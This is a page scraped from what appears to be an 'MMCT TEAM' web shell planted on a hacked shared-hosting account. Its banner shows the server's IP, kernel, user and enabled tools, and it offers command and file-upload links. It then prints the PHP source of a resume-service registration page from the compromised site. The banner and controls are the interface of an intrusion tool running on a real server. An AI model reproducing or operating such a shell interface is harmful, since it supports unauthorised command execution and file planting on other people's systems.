MMCT TEAM
Server IP : 162.214.80.37  /  Your IP : 216.73.216.83
Web Server : Apache
System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : imyrqtmy ( 2189)
PHP Version : 8.2.18
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home2/imyrqtmy/public_html/Welkinsway/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/imyrqtmy/public_html/Welkinsway/reg.php
<?php
session_start();

	unset($_SESSION['cartv']);

	session_destroy();

// 	header("Location:login.php");

?>
<!DOCTYPE html>
<html lang="en">

<?php include'include/head.php'; ?>
<link rel="stylesheet" type="text/css" href="css/bootstrap.min.css"/>
<link rel="stylesheet" type="text/css" href="css/animate.css"/>
<link rel="stylesheet" type="text/css" href="css/flaticon.css"/>
<link rel="stylesheet" type="text/css" href="css/font-awesome.css"/>
<link rel="stylesheet" type="text/css" href="css/themify-icons.css"/>
<link rel="stylesheet" type="text/css" href="css/slick.css">
<link rel="stylesheet" type="text/css" href="css/prettyPhoto.css">
<link rel="stylesheet" type="text/css" href="css/shortcodes.css"/>
<link rel="stylesheet" type="text/css" href="css/main.css"/>
<link rel="stylesheet" type="text/css" href="css/inner-page.css"/>
<link rel="stylesheet" type="text/css" href="css/megamenu.css"/>
<link rel="stylesheet" type="text/css" href="css/responsive.css"/>

</head>
<style>
    .bgsec{
        background: #fff;
    padding: 40px 30px 40px;
    box-shadow: 0 2px 20px rgba(0, 0, 0, 0.08);
    border-radius: 10px;
    width: 100%;
    overflow: hidden;
    }
    .btn-css{
        font-size: 18px !important;
    padding: 15px 25px 15px 25px !important;
    }
</style>
<body>

    <!--page start-->
    <div class="page">
       

        <!--header start-->
       <?php include'include/header.php'; ?>
        <!--header end-->


        <!-- page-title -->
        <div class="ttm-page-title-row">
            <div class="ttm-page-title-row-inner">
                <div class="container">
                    <div class="row align-items-center">
                        <div class="col-lg-12">
                            <div class="page-title-heading">
                                <h2 class="title">Registration</h2>
                            </div>
                            <div class="breadcrumb-wrapper">
                                <span>
                                    <a title="Homepage" href="index.php">Home</a>
                                </span>
                                <span>Registration</span>
                            </div>
                        </div>
                    </div>
                </div>
            </div>                    
        </div>
        <!-- page-title end -->


    <!--site-main start-->
    <div class="site-main">


        <section class="ttm-row ttm-bgcolor-grey pt-70 pb-70 clearfix">
            <div class="container">
                <div class="row">
                    <div class="col-lg-4 widget-area sidebar-left">
                        
                        <aside class="widget widget-contact ttm-bgcolor-grey bgsec">
                            
                            <div class="contact_shape_bg ttm-bgcolor-grey text-center">
                                <h4>Registration for India-International</h4>
                                <br>
                                <a class="ttm-btn ttm-btn-size-sm ttm-btn-shape-round ttm-btn-style-fill ttm-btn-color-skincolor btn-css" href="#"> ₹5900/-</a>
                                <br>
                                <br>
                                <a class="ttm-btn ttm-btn-size-md ttm-btn-shape-square ttm-btn-style-border ttm-btn-color-dark" href="cart.php"> Proceed to Payment</a>
                                <br>
                            </div>
                        </aside>
                    </div>
                    
                </div>
                
                <div class="row">
                    <div class="col-lg-12">
                  <div class="services-details-full">
                     <!-- Blog Thumbnail -->
                    

                     <h2 class="title">Registration for India-International</h2>

                     <div class="content">
                       <p>First impressions matter when competing for the job you want. Recruiters spend less than 6 seconds deciding whether your resume or CV is worth a second look. Visual CV guarantees you will always make the right first impression. Choose from a variety of industry-approved templates, create multiple profile versions, and track the results. You can even edit your CV on your mobile device. Make your next move with confidence.</p>
                        <h4>Successful Complete project </h4>
                            <ul class="features" style="list-style: none;padding: 16px;">
                               <li><i class="fa fa-check"></i> Showcase your skills and achievements with high impact visuals supporting text details.
                               </li>
                               <li><i class="fa fa-check"></i> A Professional Resume as per Indian recruitment standards.</li>
                               <li><i class="fa fa-check"></i> Multiple detailed telephonic consultations with Resume Writer.
                               </li>
                               <li><i class="fa fa-check"></i> First draft will be delivered within 10 working days.
                               </li>
                               <li><i class="fa fa-check"></i> Free Cover Letter to highlight your accomplishments and suit your job search.
                               </li>
                               <li><i class="fa fa-check"></i> Impress potential recruiters with high impact presentation and visuals.
                               </li>
                               <li><i class="fa fa-check"></i> Get better noticed over other plain text resumes.
                               </li>
                               <li><i class="fa fa-check"></i> A Visual Resume adds relevant images to your existing text Resume and enhances the visual appeal of your 'professional showcase' - your resume.</li>
                           </ul>
                        
                     </div>

                  </div>
               </div>
                    
                </div>
            </div>
        </section>


        

      
    </div><!--site-main end-->


    <!--footer start-->
    <?php include'include/footer.php'; ?>
    <!--footer end-->


    <!--back-to-top start-->
    <a id="totop" href="#top">
        <i class="fa fa-angle-up"></i>
    </a>
    <!--back-to-top end-->

</div><!-- page end -->


    <!-- Javascript -->

    <script src="js/jquery.min.js"></script>
    <script src="js/tether.min.js"></script>
    <script src="js/bootstrap.min.js"></script> 
    <script src="js/jquery.easing.js"></script>    
    <script src="js/jquery-waypoints.js"></script>    
    <script src="js/jquery-validate.js"></script> 
    <script src="js/jquery.prettyPhoto.js"></script>
    <script src="js/slick.min.js"></script>
    <script src="js/numinate.min.js"></script>
    <script src="js/imagesloaded.min.js"></script>
    <script src="js/jquery-isotope.js"></script>
    <script src="js/main.js"></script>
    <!-- Javascript end-->

    <script src="js/map.js"></script>
    <script src="https://maps.google.com/maps/api/js?sensor=false"></script>
    <!-- Javascript end-->

</body>

<!-- Mirrored from themetechmount.net/html/kaccy/contact-us-1.html by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 07 Oct 2023 10:23:39 GMT -->
</html>

MMCT - 2023